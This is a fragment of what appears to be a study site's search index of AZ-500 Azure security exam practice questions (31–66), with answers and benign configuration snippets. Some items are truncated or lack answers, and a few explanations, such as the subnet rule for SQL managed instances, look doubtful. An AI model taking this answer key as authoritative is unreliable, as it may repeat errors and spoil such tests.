        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-31","title":"Question 31","text":"

        You have an Azure subscription that contains the following resources:

        • A web app named WebApp1 in the West US Azure region
        • A virtual network named VNet1 in the West US 3 Azure region

        You need to integrate WebApp1 with VNet1. What should you implement first? Select only one answer.

        • a service endpoint
        • a VPN gateway
        • Azure Front Door
        • peering
        See response

        WebApp1 and VNet1 are in different regions and cannot use regional integration; you can use only gateway-required virtual network integration. To be able to implement this type of integration, you must first deploy a virtual network gateway in VNet1.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-32","title":"Question 32","text":"

        You host a web app on an Azure virtual machine. Users access the app through a public load balancer. You need to offload SSL traffic to the web app at the edge. What should you do? Select only one answer.

        • Configure an Azure firewall and switch access to the app via an internal load balancer.
        • Configure Azure Application Gateway.
        • Configure Azure Front Door and switch access to the app via an internal load balancer.
        • Configure Azure Traffic Manager with performance traffic routing.
        See response

        Front Door allows for SSL offloading at the edge and can route traffic to an internal load balancer. Traffic Manager does not perform SSL offloading. Neither Azure Firewall nor an Application Gateway can be deployed at the edge.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-33","title":"Question 33","text":"

        You have an Azure App Service web app named App1. You need to configure network controls for App1. App1 must only allow user access through Azure Front Door. Which two components should you implement? Each correct answer presents part of the solution. Select all answers that apply.

        • access restrictions based on service tag
        • access restrictions based on the IP address of Azure Front Door
        • application security groups
        • header filters
        See response

        Traffic from Front Door to the app originates from a well-known set of IP ranges defined in the AzureFrontDoor.Backend service tag. This includes every Front Door. To ensure traffic only originates from your specific instance, you will need to further filter the incoming requests based on the unique HTTP header that Front Door sends (x-azure-fdid).
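
        A hedged sketch of combining both restrictions on App1; the resource group, rule name, and Front Door ID value are hypothetical, and the --http-headers parameter filters on the x-azure-fdid header:

        # Allow only traffic from the Front Door service tag, filtered to one specific instance\naz webapp config access-restriction add --resource-group RG1 --name App1 --rule-name AllowFrontDoor --action Allow --priority 100 --service-tag AzureFrontDoor.Backend --http-headers x-azure-fdid=55ce4ed1-4b06-4bf1-b40e-4638452104da\n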

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-34","title":"Question 34","text":"

        You have an Azure SQL database, an Azure key vault, and an Azure App Service web app. You plan to encrypt SQL data at rest by using Bring Your Own Key (BYOK). You need to create a managed identity to authenticate without storing any credentials in the code. The managed identity must share the lifecycle with the Azure resource it is used for. What should you implement?

        • a system-assigned managed identity for an Azure SQL logical server
        • a system-assigned managed identity for an Azure web app
        • a system-assigned managed identity for Azure Key Vault
        • a user-assigned managed identity
        See response

        The managed identity is not set at the Azure SQL logical server level. It is associated with the Azure web app and used to access the encryption keys in Azure Key Vault, which enables SQL data-at-rest encryption without storing credentials in the code. The correct answer is a system-assigned managed identity for an Azure web app.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-35","title":"Question 35","text":"

        You need to provide an administrator with the ability to manage custom RBAC roles. The solution must follow the principle of least privilege. Which role should you assign to the administrator?

        • Owner
        • Contributor
        • User Access Administrator
        • Privileged Role Administrator
        See response

        User Access Administrator is the least privileged role that grants access to Microsoft.Authorization/roleDefinition/write. Assigning the Owner role does not follow the principle of least privilege. Contributor does not have access to Microsoft.Authorization/roleDefinition/write. Privileged Role Administrator grants access to manage role assignments in Azure AD, and all aspects of Azure AD Privileged Identity Management (PIM). This is not an RBAC role.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-36","title":"Question 36","text":"

        You have a storage account that contains multiple containers, blobs, queues, and tables. You need to create a key to allow an application to access only data from a given table in the storage account. Which authentication method should you use for the application?

        • SAS
        • service SAS
        • User delegation
        • Shared Allow access
        See response

        A service SAS is the only type of authentication listed that provides control at the table level. A user delegation SAS is only available for Blob storage. An account SAS and shared key access allow access to the entire storage account.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-37","title":"Question 37","text":"

        You have an Azure Storage account. You plan to prevent the use of shared keys by using Azure Policy. Which two access methods will continue to work? Each correct answer presents a complete solution.

        • Storage Blob Data Reader role
        • service SAS
        • user delegation
        • account SAS
        See response

        The Storage Blob Data Reader role uses Azure AD to authenticate. User delegation SAS is a method that uses Azure AD to generate a SAS. Both methods work whether shared keys are allowed or prevented. Service SAS and account SAS are generated by using shared keys.
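
        For context, the account-level switch that such a policy enforces can also be set directly; a minimal sketch with hypothetical names:

        # Disallow authorization with the account access keys (shared key access)\naz storage account update --resource-group RG1 --name storage1 --allow-shared-key-access false\n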

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-38","title":"Question 38","text":"

        You enable Always Encrypted for an Azure SQL database. Which scenario is supported?

        • encrypting existing data
        See response

        Encrypting existing data is supported. Always Encrypted uses the client driver to encrypt and decrypt data. This means that some actions that only occur on the server side will not work.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-39","title":"Question 39","text":"

        You are evaluating the Azure Policy configurations to identify any required custom initiatives and policies. You need to run workloads in Azure that are compliant with the following regulations:

        • FedRAMP High
        • PCI DSS 3.2.1
        • GDPR
        • ISO 27001:2013

        For which regulation should you create custom initiatives?

        • FedRAMP High
        • PCI DSS 3.2.1
        • GDPR
        • ISO 27001:2013
        See response

        To run workloads that are compliant with GDPR, custom initiatives need to be created. GDPR compliance initiatives are not yet available in Azure. Azure has existing initiatives for ISO, PCI DSS 3.2.1, and FedRAMP High.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-40","title":"Question 40","text":"

        You have a workload in Azure that uses multiple virtual machines and Azure functions to access data in a storage account. You need to ensure that all access to the storage account is done by using a single identity. The solution must reduce the overhead of managing the identity. Which type of identity should you use? Select only one answer.

        • group
        • system-assigned managed identity
        • user
        • user-assigned managed identity
        See response

        A user-assigned managed identity can be shared across Azure resources, and its password changes are handled by Azure. A user account requires manual password changes. You cannot use a group as a service principal. Multiple Azure resources cannot share a system-assigned managed identity.
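
        A minimal sketch of creating one identity and sharing it across the workload's resources (all names hypothetical):

        # Create a single user-assigned managed identity\naz identity create --resource-group RG1 --name workload-identity\n\n# Assign the same identity to a virtual machine and a function app\naz vm identity assign --resource-group RG1 --name VM1 --identities workload-identity\naz functionapp identity assign --resource-group RG1 --name func1 --identities workload-identity\n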

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-41","title":"Question 41","text":"

        You have a workload in Azure that uses a virtual machine named VM1. VM1 is in a resource group named RG1. You need to create and assign an identity to VM1 that will be used to access Azure resources. Other virtual machines must be able to use the same identity. Which PowerShell script should you run? Select only one answer.

        • New-AzUserAssignedIdentity -ResourceGroupName RG1 -Name VMID $vm = Get-AzVM -ResourceGroupName RG1 -Name VM1 Update-AzVM -ResourceGroupName RG1 -VM $vm -IdentityType UserAssigned -IdentityID \"/subscriptions/<SUBSCRIPTION ID>/resourcegroups/RG1/providers/Microsoft.ManagedIdentity/userAssignedIdentities/VM1\"
        • New-AzUserAssignedIdentity -ResourceGroupName RG1 -Name VMID $vm = Get-AzVM -ResourceGroupName RG1 -Name VM1 Update-AzVM -ResourceGroupName RG1 -VM $vm -IdentityType UserAssigned -IdentityID \"/subscriptions/<SUBSCRIPTION ID>/resourcegroups/RG1/providers/Microsoft.ManagedIdentity/userAssignedIdentities/VMID\"
        • $vm = Get-AzVM -ResourceGroupName RG1 -Name VM1 Update-AzVM -ResourceGroupName RG1 -VM $vm -IdentityType SystemAssigned
        • $vm = Get-AzVM -ResourceGroupName RG1 -Name VM1 Update-AzVM -ResourceGroupName RG1 -VM $vm -IdentityType SystemAssignedUserAssigned
        See response

        New-AzUserAssignedIdentity -ResourceGroupName RG1 -Name VMID $vm = Get-AzVM -ResourceGroupName RG1 -Name VM1 Update-AzVM -ResourceGroupName RG1 -VM $vm -IdentityType UserAssigned -IdentityID \"/subscriptions/<SUBSCRIPTION ID>/resourcegroups/RG1/providers/Microsoft.ManagedIdentity/userAssignedIdentities/VMID\"

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-42","title":"Question 42","text":"

        You have an Azure subscription that contains an Azure Kubernetes Service (AKS) cluster named AKS1 and a user named User1. You need to ensure that User1 has access to AKS1 secrets. The solution must follow the principle of least privilege. Which role should you assign to User1? Select only one answer.

        • Azure Kubernetes Service RBAC Admin
        • Azure Kubernetes Service RBAC Cluster Admin
        • Azure Kubernetes Service RBAC Reader
        • Azure Kubernetes Service RBAC Writer
        See response

        Azure Kubernetes Service RBAC Writer has access to secrets. Azure Kubernetes Service RBAC Reader does not have access to secrets. Azure Kubernetes Service RBAC Cluster Admin and Azure Kubernetes Service RBAC Admin do not follow the principle of least privilege.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-43","title":"Question 43","text":"

        You have an Azure subscription that contains an Azure container registry named CR1. You use Azure CLI to authenticate to the subscription. You need to authenticate to CR1 by using Azure CLI. Which command should you run? Select only one answer.

        • az acr config
        • az acr credential
        • az acr login
        • docker login
        See response

        The az acr login command is needed to authenticate to an Azure container registry from the Azure CLI. docker login is used to sign in to a Docker repository. az acr config is used for configuring Azure Container Registry. az acr credential is used for managing login credentials for Azure Container Registry.
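
        For completeness, the command in use (registry name from the question):

        # Authenticate to the registry by using the current Azure CLI session\naz acr login --name CR1\n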

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-44","title":"Question 44","text":"

        You have an Azure AD tenant that syncs with the on-premises Active Directory Domain Service (AD DS) domain and uses Azure Active Directory Domain Services (Azure AD DS). You have an application that runs on user devices by using the credentials of the signed-in user. The application accesses data in Azure Files by using REST calls. You need to configure authentication for the application in Azure Files by using the most secure authentication method. Which authentication method should you use? Select only one answer.

        • Azure AD
        • SAS
        • shared key
        • on-premises Active Directory Domain Service (AD DS)
        See response

        A SAS is the most secure way to access Azure Files by using REST calls. A shared key allows any user with the key to access data. Azure AD and Active Directory Domain Service (AD DS) are unsupported for REST calls.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-45","title":"Question 45","text":"

        You have an Azure SQL Database server. You enable Azure AD authentication for Azure SQL. You need to prevent other authentication methods from being used. Which command should you run? Select only one answer.

        • az sql mi ad-admin create
        • az sql mi ad-only-auth enable
        • az sql server ad-admin create
        • az sql server ad-only-auth enable
        See response

        az sql server ad-only-auth enable

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-46","title":"Question 46","text":"

        You are configuring an Azure Policy in your environment. You need to ensure that any resources that are missing a tag named CostCenter inherit a value from a resource group. You create a custom policy that uses the following snippet.

        \"policyRule\": {\n    \"if\": {\n        \"field\": \"tags['CostCenter']\",\n        \"exists\": \"false\"\n    },\n    \"then\": {\n        \"effect\": \"modify\",\n        \"details\": {\n            \"roleDefinitionIds\": [\n                \"/providers/microsoft.authorization/roleDefinitions/b24988ac-6180-42a0-ab88-20f7382dd24c\"\n            ],\n            \"operations\": [{\n                \"operation\": \"addOrReplace \",\n                \"field\": \"tags['CostCenter']\",\n                \"value\": \"[resourcegroup().tags['CostCenter']]\"\n            }]\n        }\n    }\n}\n

        Which policy mode should you use? Select only one answer.

        • all
        • Append
        • DeployIfNotExists
        • indexed
        See response

        Indexed.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-47","title":"Question 47","text":"

        You set Periodic recurring scans to ON while implementing a Microsoft Defender for SQL vulnerability assessment. How often will the scan be triggered? Select only one answer.

        • at a recurrence that you configure
        • once a day
        • once a month
        • once a week
        See response

        Once a week.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-48","title":"Question 48","text":"

        You are implementing Microsoft Defender for SQL vulnerability assessments. In which two locations can users view the results? Each correct answer presents a complete solution. Select all answers that apply.

        • an Azure Blob storage account
        • an Azure Event Grid instance
        • Microsoft Defender for Cloud
        • Microsoft Teams
        See response

        Defender for Cloud is the default and mandatory location to view the results, while a Blob storage account is a mandatory destination and a prerequisite for enabling the scan. The Teams option is unavailable out of the box. A scan completion event is not sent to Event Grid.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-49","title":"Question 49","text":"

        You are collecting Azure activity logs to Azure Monitor. The retention period for Azure Monitor logs is set to 30 days. To meet compliance requirements, you need to send a copy of the Azure activity logs to your SOC partner. What should you do? Select only one answer.

        • Configure a workspace retention policy.
        • Configure diagnostic settings and send the logs to Azure Event Hubs.
        • Configure diagnostic settings and send the logs to Azure Storage.
        • Install the Microsoft Sentinel security information and event management (SIEM) connector.
        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-50","title":"Question 50","text":"

        You are designing an Azure solution that stores encrypted data in Azure Storage. You need to ensure that the keys used to encrypt the data cannot be permanently deleted until 60 days after they are deleted. The solution must minimize costs. What should you do? Select only one answer.

        • Store keys in an HSM-protected key vault that has soft delete and purge protection enabled.
        • Store keys in an HSM-protected key vault that has soft delete enabled.
        • Store keys in a software-protected key vault that has soft delete and purge protection enabled.
        • Store keys in a software-protected key vault that has soft delete enabled and purge protection disabled.
        See response

        Store keys in a software-protected key vault that has soft delete and purge protection enabled.
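
        A minimal sketch of the chosen configuration, with hypothetical vault, resource group, and location names; --retention-days sets the soft-delete retention window to 60 days:

        az keyvault create --resource-group RG1 --name kv-encryption1 --location eastus --retention-days 60 --enable-purge-protection true\n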

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-51","title":"Question 51","text":"

        You plan to provide connectivity between Azure and your company's datacenter. You need to define how to establish the connection. The solution must meet the following requirements:

        • All traffic between the datacenter and Azure must be encrypted.
        • Bandwidth must be between 10 and 100 Gbps.

        What should you use for the connection? Select only one answer.

        • Azure VPN Gateway
        • ExpressRoute Direct
        • ExpressRoute with a provider
        • VPN Gateway with Azure Virtual WAN
        See response

        ExpressRoute Direct

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-52","title":"Question 52","text":"

        You are operating in a cloud-only environment. Users have computers that run either Windows 10 or 11. The users are located across the globe. You need to secure access to a point-to-site (P2S) VPN by using multi-factor authentication (MFA). Which authentication method should you implement? Select only one answer.

        • Authenticate by using Active Directory Domain Services (AD DS).
        • Authenticate by using native Azure AD authentication.
        • Authenticate by using native Azure certificate-based authentication.
        • Authenticate by using RADIUS.
        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-53","title":"Question 53","text":"

        You have an Azure subscription that contains the following resources:

        • Two virtual networks
          • VNet1: Contains two subnets
          • VNet2: Contains three subnets
        • Virtual machines: Connected to all the subnets on VNet1 and VNet2
        • A storage account named storage1

        You need to identify the minimal number of service endpoints that are required to meet the following requirements:

        • Virtual machines that are connected to the subnets of VNet1 must be able to access storage1 over the Azure backbone.
        • Virtual machines that are connected to the subnets of VNet2 must be able to access Azure AD over the Azure backbone.

        How many service endpoints should you recommend? Select only one answer.

        • 2
        • 3
        • 4
        • 5
        See response

        A service endpoint is configured for a specific service at the subnet level. Based on the requirements, you need to configure two service endpoints for Microsoft.Storage on VNet1 because VNet1 has two subnets, and three service endpoints for Microsoft.AzureActiveDirectory on VNet2 because VNet2 has three subnets. The minimum number of service endpoints that you must configure is five.
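
        As a sketch, one endpoint is added per subnet; for example, for one subnet on each virtual network (the resource group and VNet2 subnet names are hypothetical):

        # One Microsoft.Storage endpoint per VNet1 subnet (repeat for the second subnet)\naz network vnet subnet update --resource-group RG1 --vnet-name VNet1 --name Subnet1 --service-endpoints Microsoft.Storage\n\n# One Microsoft.AzureActiveDirectory endpoint per VNet2 subnet (repeat for the other two)\naz network vnet subnet update --resource-group RG1 --vnet-name VNet2 --name Subnet1 --service-endpoints Microsoft.AzureActiveDirectory\n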

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-54","title":"Question 54","text":"

        You have an Azure subscription that contains a virtual network named VNet1. VNet1 contains the following subnets:

        • Subnet1: Has a connected virtual machine
        • Subnet2: Has a Microsoft.Storage service endpoint
        • Subnet3: Has subnet delegation to the Microsoft.Web/serverFarms service
        • Subnet4: Has no additional configurations

        You need to deploy an Azure SQL managed instance named managed1 to VNet1. To which subnets can you connect managed1? Select only one answer.

        • Subnet4 only
        • Subnet3 and Subnet4 only
        • Subnet2 and Subnet4 only
        • Subnet2, Subnet3, and Subnet4 only
        • Subnet1, Subnet2, Subnet3, and Subnet4
        See response

        You can deploy an SQL managed instance to a dedicated virtual network subnet that does not have any resources connected. The subnet can have a service endpoint or can be delegated to a different service. For this scenario, you can deploy managed1 to Subnet2, Subnet3, and Subnet4 only. You cannot deploy managed1 to Subnet1 because Subnet1 has a connected virtual machine.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-55","title":"Question 55","text":"

        You use Azure Blueprints to deploy resources to a resource group named RG1. After the deployment, you try to add a disk to a virtual machine created by using Blueprints, but you get an access denied error. You open\u00a0RG1\u00a0and check your access. You notice that you are listed as part of the Virtual Machine Contributor role for RG1, and there are no deny assignments or classic administrators in the resource group scope. Why are you unable to manage the virtual machine? Select only one answer.

        • Blueprints created a deny assignment for the virtual machine resource.
        • Blueprints removed the user from the Classic Administrator role.
        • You must be part of the Disk Pool Operator role.
        • You must be part of the Virtual Machine Administrator Login role.
        See response

        Blueprints must have created a deny assignment at the resource level. The Disk Pool Operator role allows users to provide permissions to the StoragePool resource provider, and the Virtual Machine Administrator Login role allows users to view the virtual machine in the portal and sign in as an administrator. You still have the Virtual Machine Contributor role and should be able to manage the virtual machine unless a deny assignment is in place.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-56","title":"Question 56","text":"

        You create an Azure policy by using the following snippet.

        \"then\": {\n    \"effect\": \"\",\n    \"details\": [{\n        \"field\": \"Microsoft.Storage/storageAccounts/networkAcls.ipRules\",\n        \"value\": [{\n            \"action\": \"Allow\",\n            \"value\": \"134.5.0.0/21\"\n        }]\n    }]\n}\n

        You need to ensure that the policy is applied whenever a new storage account is created or updated. There is no managed identity assigned to the policy initiative. Which effect should you use? Select only one answer.

        • Append
        • Audit
        • DeployIfNotExists
        • Modify
        See response

        Append\u00a0is used to add fields to existing properties and does not require a managed identity.\u00a0Modify\u00a0is used to add, update, or remove properties, but it requires a managed identity to remediate resources, as does\u00a0DeployIfNotExists, which is used to deploy resources.\u00a0Audit\u00a0only checks for compliance. Because no managed identity is assigned to the initiative, Append is the effect to use.
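
        For illustration, this is the same snippet from the question with the Append effect filled in; everything else is unchanged:

        \"then\": {\n    \"effect\": \"Append\",\n    \"details\": [{\n        \"field\": \"Microsoft.Storage/storageAccounts/networkAcls.ipRules\",\n        \"value\": [{\n            \"action\": \"Allow\",\n            \"value\": \"134.5.0.0/21\"\n        }]\n    }]\n}\n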

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-57","title":"Question 57","text":"

        You have an Azure subscription. You need to recommend a solution that uses crawling technology of Microsoft to discover and actively scan assets within an online infrastructure. The solution must also discover new connections over time. What should you include in the recommendation? Select only one answer.

        • a Microsoft Defender for Cloud custom initiative
        • Microsoft Defender External Attack Surface Management (EASM)
        • Microsoft Defender for Servers
        • the Microsoft cloud security benchmark (MCSB)
        See response

        Defender EASM applies the crawling technology of Microsoft to discover assets that are related to your known online infrastructure and actively scans these assets to discover new connections over time. Attack Surface Insights are generated by applying vulnerability and infrastructure data to showcase the key areas of concern for your organization.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-58","title":"Question 58","text":"

        You have an Azure subscription and the following SQL deployments:

        • An Azure SQL database named DB1
        • An Azure SQL Server named sqlserver1
        • An instance of SQL Server on Azure Virtual Machines named VM1 that has Microsoft SQL Server 2022 installed
        • An on-premises server named Server1 that has SQL Server 2019 installed

        Which deployments can be protected by using Microsoft Defender for Cloud? Select only one answer.

        • DB1 and sqlserver1 only
        • DB1, sqlserver1, and VM1 only
        • DB1, sqlserver1, VM1, and Server1
        • sqlserver1 only
        • sqlserver1 and VM1 only
        See response

        Defender for Cloud includes Microsoft Defender for SQL. Defender for SQL can protect Azure SQL Database, Azure SQL Server, SQL Server on Azure Virtual Machines, and SQL servers installed on on-premises servers.
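
        A hedged Azure PowerShell sketch of enabling the relevant Defender for SQL plans on the current subscription (SqlServers and SqlServerVirtualMachines are the documented pricing plan names; subscription scope is assumed):

        # Enable the Defender plan for Azure SQL databases and for SQL servers on machines\nSet-AzSecurityPricing -Name 'SqlServers' -PricingTier 'Standard'\nSet-AzSecurityPricing -Name 'SqlServerVirtualMachines' -PricingTier 'Standard'\n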

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-59","title":"Question 59","text":"

        You are designing a solution that must meet FIPS 140-2 Level 3 compliance in Azure. Where should the solution maintain encryption keys? Select only one answer.

        • a managed HSM
        • a software-protected Azure key vault
        • an Azure SQL Managed Instance database
        • an HSM-protected Azure key vault
        See response

        A managed HSM is FIPS 140-2 Level 3-compliant. An HSM-protected key vault is Level 2-compliant. A software-protected key vault is Level 1-compliant. SQL is not FIPS 140-2 Level 3-compliant.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-60","title":"Question 60","text":"

        You have an Azure tenant that contains a user named User1 and an Azure key vault named Vault1. Vault1 is configured to use Azure role-based access control (RBAC). You need to ensure that User1 can perform actions on keys in Vault1 but cannot manage permissions. The solution must follow the principle of least privilege. Which role should you assign to User1? Select only one answer.

        • Key Vault Crypto Officer
        • Key Vault Crypto User
        • Key Vault Reader
        • Key Vault Secrets Officer
        • Key Vault Secrets User
        See response

        Correct: Key Vault Crypto Officer \u2013\u2013 This role can perform actions on keys but cannot manage role assignments, so it meets the requirements. Incorrect: Key Vault Secrets Officer \u2013\u2013 This role is for secrets, not keys. Incorrect: Key Vault Reader \u2013\u2013 This role only allows read access, not performing actions. Incorrect: Key Vault Crypto User \u2013\u2013 This role can only use keys for cryptographic operations; it cannot perform key management actions such as creating or rotating keys. Incorrect: Key Vault Secrets User \u2013\u2013 This role is for secrets, not keys.
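
        A minimal sketch of the corresponding assignment with Azure PowerShell (the user and vault names are hypothetical):

        # Assign Key Vault Crypto Officer scoped to the vault only (least privilege; names are hypothetical)\n$vault = Get-AzKeyVault -VaultName 'Vault1'\nNew-AzRoleAssignment -SignInName 'user1@contoso.com' -RoleDefinitionName 'Key Vault Crypto Officer' -Scope $vault.ResourceId\n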

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-61","title":"Question 61","text":"

        You are implementing an Azure Kubernetes Service (AKS) cluster for a production workload. You need to ensure that the cluster meets the following requirements:

        • Provides the highest networking performance possible
        • Manages ingress traffic by using Kubernetes tools

        What should you use? Select only one answer.

        • CNI networking with Azure load balancers
        • CNI networking with ingress resources and controllers
        • Kubenet networking with Azure load balancers
        • Kubenet networking with ingress resources and controllers
        See response

        CNI networking provides the best performance because it does not require IP forwarding or user-defined routes (UDR), and ingress controllers can be managed from within Kubernetes. Kubenet networking requires user-defined routes and IP forwarding, making the network slower. Azure load balancers cannot be managed by using Kubernetes tools.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-62","title":"Question 62","text":"

        You have an Azure subscription that contains a virtual machine named VM1. VM1 is configured with just-in-time (JIT) VM access. You need to request access to VM1. Which PowerShell cmdlet should you run? Select only one answer.

        • Add-AzNetworkSecurityRuleConfig
        • Get-AzJitNetworkAccessPolicy
        • Set-AzJitNetworkAccessPolicy
        • Start-AzJitNetworkAccessPolicy
        See response

        The\u00a0Start-AzJitNetworkAccessPolicy\u00a0PowerShell cmdlet is used to request access to a JIT-enabled virtual machine.\u00a0Set-AzJitNetworkAccessPolicy\u00a0is used to enable JIT on a virtual machine.\u00a0Get-AzJitNetworkAccessPolicy\u00a0and\u00a0Add-AzNetworkSecurityRuleConfig\u00a0are not used to request access.
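
        A hedged sketch of such a request, following the pattern in Microsoft's JIT documentation (the subscription ID, resource names, port, end time, and source address are illustrative):

        # Request JIT access to VM1 on RDP port 3389 from a single source address (values are illustrative)\n$vm = @{ id = '/subscriptions/<subscription-id>/resourceGroups/RG1/providers/Microsoft.Compute/virtualMachines/VM1'; ports = (@{ number = 3389; endTimeUtc = '2024-06-09T20:00:00Z'; allowedSourceAddressPrefix = @('10.0.0.5') }) }\nStart-AzJitNetworkAccessPolicy -ResourceGroupName 'RG1' -Location 'eastus' -Name 'default' -VirtualMachine @($vm)\n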

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-63","title":"Question 63","text":"

        You create a role by using the following JSON.

        {\n  \"Name\": \"Virtual Machine Operator\",\n  \"Id\": \"88888888-8888-8888-8888-888888888888\",\n  \"IsCustom\": true,\n  \"Description\": \"Can monitor and restart virtual machines.\",\n  \"Actions\": [\n    \"Microsoft.Storage/*/read\",\n    \"Microsoft.Network/*/read\",\n    \"Microsoft.Compute/virtualMachines/start/action\",\n    \"Microsoft.Compute/virtualMachines/restart/action\",\n    \"Microsoft.Authorization/*/read\",\n    \"Microsoft.ResourceHealth/availabilityStatuses/read\",\n    \"Microsoft.Resources/subscriptions/resourceGroups/read\",\n    \"Microsoft.Insights/alertRules/*\",\n    \"Microsoft.Insights/diagnosticSettings/*\",\n    \"Microsoft.Support/*\"\n  ],\n  \"NotActions\": [],\n  \"DataActions\": [],\n  \"NotDataActions\": [],\n  \"AssignableScopes\": [\"/subscriptions/*\"]\n}\n

        A user that is part of the new role reports that they are unable to restart a virtual machine by using a PowerShell script. What should you do to ensure that the user can restart the virtual machine?

        • Add\u00a0Microsoft.Compute/virtualMachines/login/action\u00a0to the list of\u00a0DataActions\u00a0in the custom role.
        • Add\u00a0Microsoft.Compute/*/read\u00a0to the list of\u00a0Actions\u00a0in the role.
        See response

        The role needs read access to virtual machines to restart them. The user does not need to authenticate again for the role to be in effect, and the user will not be able to access the virtual machine from the portal. Adding\u00a0Microsoft.Compute/virtualMachines/login/action\u00a0to the list of\u00a0DataActions\u00a0in the role allows the user to sign in as a user, but not to restart the virtual machine.
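
        A minimal Azure PowerShell sketch of adding the missing action to the custom role (assuming the role exists as defined above):

        # Give the role read access to compute resources so its members can restart virtual machines\n$role = Get-AzRoleDefinition -Name 'Virtual Machine Operator'\n$role.Actions.Add('Microsoft.Compute/*/read')\nSet-AzRoleDefinition -Role $role\n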

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-64","title":"Question 64","text":"

        You have a Linux virtual machine in an on-premises datacenter that is used as a forwarder for Microsoft Sentinel by using CEF-formatted logs. The timestamp on events retrieved from the forwarder is the time the agent on the forwarder received the event, not the time the event occurred on the system it came from. You need to ensure that Microsoft Sentinel receives the time the event was generated. What should you do? Select only one answer.

        • Run\u00a0cef_gather_info.py\u00a0on CEF forwarder.
        • Run\u00a0cef_gather_info.py\u00a0on each system that sends events to the forwarder.
        • Run\u00a0TimeGenerated.py\u00a0on each system that sends events to the forwarder.
        • Run\u00a0TimeGenerated.py\u00a0on the CEF forwarder.
        See response

        Running\u00a0TimeGenerated.py\u00a0on the CEF forwarder changes the logging on the forwarder to use the event time instead of the time the event was received by the agent on the forwarder. Running\u00a0TimeGenerated.py\u00a0on each system will not change the way events are logged on the forwarder. Running\u00a0cef_gather_info.py\u00a0gathers data, but it does not change the timestamp.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-65","title":"Question 65","text":"

        You configure a Linux virtual machine to send Syslog data to Microsoft Sentinel. You notice that events for the virtual machine are duplicated in Microsoft Sentinel. You need to ensure that the events are not duplicated. Which two actions should you perform? Each correct answer presents part of the solution. Select all answers that apply.

        • Disable the synchronization of the Log Analytics agent with the Syslog configuration in Microsoft Sentinel.
        • Disable the Syslog daemon from listening to network messages.
        • Enable the Syslog daemon to listen to network messages.
        • Remove the entry used to send CEF messages from the Syslog configuration file for the virtual machine.
        • Stop the Syslog daemon on the virtual machine.
        See response

        You must remove the entry used to send CEF messages from the Syslog configuration file and disable the synchronization of the Log Analytics agent with the Syslog configuration in Microsoft Sentinel so that the entry is not re-created. Stopping the Syslog daemon on the virtual machine would stop the virtual machine from sending both Syslog and CEF messages. Enabling or disabling the Syslog daemon's listening for network messages does not handle the duplication of events.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-66","title":"Question 66","text":"

        You are configuring automatic key rotation for an encryption key stored in Azure Key Vault. You need to implement an alert to be triggered five days before the keys are rotated. What should you use? Select only one answer.

        • an action group alert
        • Application Insights
        • Azure Event Grid
        • Microsoft Defender for Key Vault
        See response

        Using Event Grid triggers the\u00a0Microsoft.KeyVault.KeyNearExpiry\u00a0event. Key Vault cannot be monitored by using Application Insights. Defender for Key Vault is used to alert on unusual and unplanned activities. Key Vault key expiration cannot be monitored by using action group alerts.
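
        A hedged sketch of wiring this up with Azure PowerShell (the vault name, subscription name, and webhook endpoint are hypothetical):

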